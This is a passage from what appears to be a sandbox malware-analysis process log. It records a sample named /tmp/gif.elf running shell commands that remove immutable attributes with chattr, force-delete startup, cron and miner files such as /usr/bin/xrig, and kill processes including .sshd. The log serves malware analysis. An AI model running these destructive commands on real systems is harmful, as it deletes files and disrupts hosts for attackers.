                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr -ia /etc/rc.d/init.d/selinux
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr -ia /etc/rc.d/init.d/DbSecuritySp > /dev/null 2>&1 && rm -rf /etc/rc.d/init.d/DbSecuritySpt > /dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr -ia /etc/rc.d/init.d/DbSecuritySp
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr -ia /usr/bin/sh.sh > /dev/null 2>&1 && rm -rf /usr/bin/sh.sh > /dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr -ia /usr/bin/sh.sh
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr -ia /etc/cron.hourly/cron.sh > /dev/null 2>&1 && rm -rf /etc/cron.hourly/cron.sh > /dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr -ia /etc/cron.hourly/cron.sh
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr -ia /lib/udev/udev /lib/udev/debug > /dev/null 2>&1 && rm -rf /lib/udev/udev /lib/udev/debug > /dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr -ia /lib/udev/udev /lib/udev/debug
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "chattr -ia /usr/bin/xrig > /dev/null 2>&1 && rm -rf /usr/bin/xrig 1> /dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:38
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/chattr
                                  Arguments:chattr -ia /usr/bin/xrig
                                  File size:14656 bytes
                                  MD5 hash:fae2c2deaeca3bbf906fb8034304ad32

                                  Start time (UTC):01:52:39
                                  Start date (UTC):10/03/2025
                                  Path:/tmp/gif.elf
                                  Arguments:-
                                  File size:115848 bytes
                                  MD5 hash:ec8ec8bb794a4cb09aaf8ff893829e94

                                  Start time (UTC):01:52:39
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:sh -c "killall .sshd xrig getty > /dev/null 2>&1 "
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:39
                                  Start date (UTC):10/03/2025
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time (UTC):01:52:39
                                  Start date (UTC):10/03/2025
                                  Path:/usr/bin/killall
                                  Arguments:killall .sshd xrig getty
                                  File size:32024 bytes
                                  MD5 hash:cd2adedbee501869ac691b88af39cd8b